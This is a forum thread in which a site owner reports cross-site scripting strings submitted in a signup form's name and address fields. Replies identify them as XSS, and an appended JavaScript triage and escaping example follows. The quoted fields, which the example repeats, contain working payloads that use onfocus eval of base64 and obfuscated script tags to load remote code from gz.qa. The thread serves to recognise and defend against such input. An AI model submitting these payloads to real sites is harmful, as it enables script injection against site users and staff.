nuffsaid
Posted January 15, 2021

Hello

I received a signup this morning where a customer placed this code on the name and address fields.

Has anyone experienced this and what is this person trying to achieve or has achieved?

Name: Linda'"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZ3oucWEveSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus> Juan"><sCRiPt sRC=//gz.qa/y></sCrIpT>
Email: <<redacted>>
Company:
Address 1: 444 Rollins St"><sCRiPt sRC=//gz.qa/y></sCrIpT>
Address 2: '"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZ3oucWEveSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus>
City: Pretoria
State: Pretoria
Postcode: 0083
Country: ZA

brian!
Posted January 15, 2021

28 minutes ago, nuffsaid said:
> Has anyone experienced this and what is this person trying to achieve or has achieved?

Do a Google search on XSS - cross site scripting.

nuffsaid
Posted January 15, 2021

Thanks, did a search and I now understand how that works.

Also, after inquiring, it turns out WHMCS sanitizes the input on the registration form, so the code is displayed rather than executed.

Everything is alright.
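
For readers triaging a similar signup, here is an added example (not part of the thread and not WHMCS code) that reports what a submitted field contains, decodes the base64 `id` value so it can be read, and shows the output encoding that makes the field display as text. The helper names `escapeHtml` and `triageField` are hypothetical; the sample value is the first part of the Name field from the first post.

```javascript
// Added example, not WHMCS code; helper names are hypothetical.
// SAMPLE_NAME is the first part of the Name field quoted in the thread.
const SAMPLE_NAME =
  'Linda\'"><input onfocus=eval(atob(this.id)) id=' +
  'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZ3oucWEveSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=' +
  ' autofocus>';

// Encode the characters that let a value break out of an HTML text node or
// a quoted attribute. Applied when the value is written into a page.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Triage helper: list markup-like constructs found in a field and decode any
// base64 id=... value so a reviewer can read what the handler would eval.
function triageField(value) {
  const findings = [];
  if (/<\s*script\b/i.test(value)) findings.push('script tag');
  if (/\bon[a-z]+\s*=/i.test(value)) findings.push('inline event handler');
  if (/['"]\s*>/.test(value)) findings.push('attribute break-out sequence');
  const decoded = [];
  for (const m of value.matchAll(/\bid=([A-Za-z0-9+/]{16,}={0,2})/g)) {
    decoded.push(Buffer.from(m[1], 'base64').toString('utf8'));
  }
  return { suspicious: findings.length > 0, findings, decoded };
}

const report = triageField(SAMPLE_NAME);
console.log(report.findings);          // what was found in the field
console.log(report.decoded);           // readable form of the encoded id value
console.log(escapeHtml(SAMPLE_NAME));  // what an encoding page would emit
```

The decoded value is the same remote script include as the `<sCRiPt sRC=//gz.qa/y>` variant in the address fields. Encoding has to happen in every place the stored value is rendered, not only on the form that accepted it.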